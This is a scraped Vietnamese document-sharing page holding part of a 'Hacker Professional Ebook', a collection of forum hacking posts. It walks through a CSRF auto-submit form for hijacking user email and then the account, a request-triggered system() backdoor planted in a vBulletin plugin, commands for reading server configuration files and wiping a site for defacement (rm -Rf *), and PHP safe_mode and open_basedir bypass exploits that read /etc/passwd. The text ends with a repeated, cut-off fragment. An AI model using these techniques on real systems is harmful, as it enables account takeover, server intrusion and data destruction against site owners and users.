Hacker Professional Ebook part 275 doc

6 141 1
Hacker Professional Ebook part 275 doc

Đang tải... (xem toàn văn)

Thông tin tài liệu

4. Sử dụng cách 3: 4.1. Tìm hiểu về cách hoạt động của form: VD khi user sử dụng update email option thì form sẽ có dạng: <form method="post" action="update.php"> <input type="text" name="email" value="user@email.com"> <input type="submit" name="but" value="send"> </form> khi data được gửi = form trên tới server thì server sẽ check xem user nào gửi tới + right to update của user đó rồi thực hiện request. 4.2. Làm sao "nhờ" user sử dụng form trên theo ý mình? Gửi cho user một html page trong đó có: + form trên nhưng các value của input theo ý mình (vd: hacker@email.com) + sử dụng thêm hàm auto submit form để khi user mở html file này thì form sẽ tự động submit, tag này có dạng: <body onLoad="document.forms[0].submit();"> + nên sử dụng thêm một vài tiểu xảo che mắt user, không cho user biết là option của mình đã bị sử dụng trái phép < tự tìm hiểu. 5. Kết quả: vì request này được gửi đi từ máy user + thêm đk cần là user đang online nên session/cookies check đều ok. Request vẫn được thực hiện kể cả user không online nhưng để chế độ nhớ password. Ở vd trên ta đã update được user email, từ đó dùng option forgot pass để lấy password của user này (cái này ai cũng biết ) 6. Ưu nhược điểm: - Ưu điểm: phương pháp đơn giản, chỉ dựa trên nguyên tắc hoạt động thông thường của form < không phải là lỗi bảo mật. Có thể sử dụng được nhiều option của user mà không cần phải login = user account (vd có thể update user info, gửi bài, xoá bài, pm với nick của user, một số forum Admin CP khơng được pwd protected & biết admin default path ta có thể "nhờ" admin update mình lên làm admin luôn, hehe) - Nhược điểm: phụ thuộc nhiều vào độ cảnh giác của user (eg: disable js)(tuy nhiên theo kinh nghiệm của tớ thì chưa ai từ chối bấm vào html link cả ). + cái gì đó chưa nghĩ ra 7. Chống hack=cách này: + Protect user panel/update action file = một lần password nữa (khi user muốn update info thì phải gõ lại pass) + khi form được submit thì kiểm tra xem các variable trong form đến từ đâu, nếu HTTP_REFERER không phải từ web của mình thì không thực hiện request + chưa nghĩ ra 8. Kết luận: có thể áp dụng cái natural danger của http này vào nhiều cái để nghịch, không chỉ hack forum ksvthdang(HcE Gr0up) bổ sung: 9. Social engineering ! black_hat_cr(HCE) Chạy Shell trong ACP của vBB ! Thấy có nhiều bạn thắc mắc về run shell code trong acp của vBB nên post lên tham khảo chơi ! Khi các bạn đã vào được ACP của 4rum vBB rồi thì hãy để ý chỗ "Plugin Manager" ! Click vào và bạn chọn "Edit" 1 plugin nào đó bạn sẽ thấy nó thực thi mã php ! Ok ! MÀ đã chạy được mã php rồi các bạn chắc đã biết phải làm gì rồi chứ vd : Tui edit : Top 'X' Stats by InfiniteWebby ( forum có hack mod top statics ) nội dung : PHP Code: if (THIS_SCRIPT == "index" OR THIS_SCRIPT == "topXstats") { global $globaltemplates; $globaltemplates = array_merge($globaltemplates, array('topXstats_stats_b it', 'topXstats_member_bit', 'topXstats_poster_bit', 'topXstats_thread_bit')); } vậy tui chỉ cần thêm vào : PHP Code: if($_REQUEST['langtu']=="haohoa") { system('ls'); } rồi run : http://xxx.com/forum/topXstats.php?langtu=haohoa ! sẽ thấy kết quả Khá đơn giản phải ko Nếu đã thực thi được php code rồi thì mình có thể làm cả khối việc trên cái host í langtuhaohoa(HCE) Những CMD thường dùng khi Hack local Đây là các lệnh thường dùng của những hacker khi hack local bạn xem thữ nhé' cat /etc/httpd/conf/httpd.conf|grep ServerName cat /etc/httpd/conf/httpd.conf cat /etc/localdomains cat /etc/trueuserdomains cat /etc/userdomains Borrado de archivos y logs "Gracias megabyte": rm -Rf * && mkdir public_html && echo "was here!" > public_html/index.html Para hacer el index: touch index.html echo "Was here!">index.html cp index.html public_html Vns3curity(HCE) 1 vài chiêu thức local ! sưu tầm từ nhiều người ! 1. Cho php 4.2 và 5.12 trở xuống: thanks to Maksymilian Arciemowicz Code: <?php /* Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2 by Maksymilian Arciemowicz */ $file=""; // File to Include or use _GET _POST $tymczas=""; // Set $tymczas to dir where you have 777 like /var/tmp echo "<PRE>\n"; if(empty($file)){ if(empty($_GET['file'])){ if(empty($_POST['file'])){ die("\nSet varibles \$tymczas, \$file or use for varible file POST, GET like ?file=/etc/passwd\n <B><CENTER><FONT COLOR=\"RED\">SecurityReason.Com Exploit</FONT></CENTER></B>"); } else { $file=$_POST['file']; } } else { $file=$_GET['file']; } } $temp=tempnam($tymczas, "cx"); if(copy("compress.zlib://".$file, $temp)){ $zrodlo = fopen($temp, "r"); $tekst = fread($zrodlo, filesize($temp)); fclose($zrodlo); echo "<B> Start File ".htmlspecialchars($file)." </B>\n".htmlspecialchars($tekst)."\n<B> End File ".htmlspecialchars($file)." \n"; unlink($temp); die("\n<FONT COLOR=\"RED\"><B>File ".htmlspecialchars($file)." has been already loaded. SecurityReason Team ;]</B></FONT>"); } else { die("<FONT COLOR=\"RED\"><CENTER>Sorry File <B>".htmlspecialchars($file)."</B> dosen't exists or you don't have access.</CENTER></FONT>"); } ?> 2. cho php 4.4 và 5.16 trở xuống (thanks to Maksymilian Arciemowicz) local qua php_admin* bypass by ini_restore() !! Code: <? echo ini_get("safe_mode"); echo ini_get("open_basedir"); include("/etc/passwd"); ini_restore("safe_mode"); ini_restore("open_basedir"); echo ini_get("safe_mode"); echo ini_get("open_basedir"); include("/etc/passwd"); ?> 3. Code: <? $vnforce = @imap_open("/path/file", "", ""); . input theo ý mình (vd: hacker@ email.com) + sử dụng thêm hàm auto submit form để khi user mở html file này thì form sẽ tự động submit, tag này có dạng: <body onLoad="document.forms[0].submit();">. langtuhaohoa(HCE) Những CMD thường dùng khi Hack local Đây là các lệnh thường dùng của những hacker khi hack local bạn xem thữ nhé' cat /etc/httpd/conf/httpd.conf|grep ServerName cat

Ngày đăng: 04/07/2014, 12:20

Tài liệu cùng người dùng

Tài liệu liên quan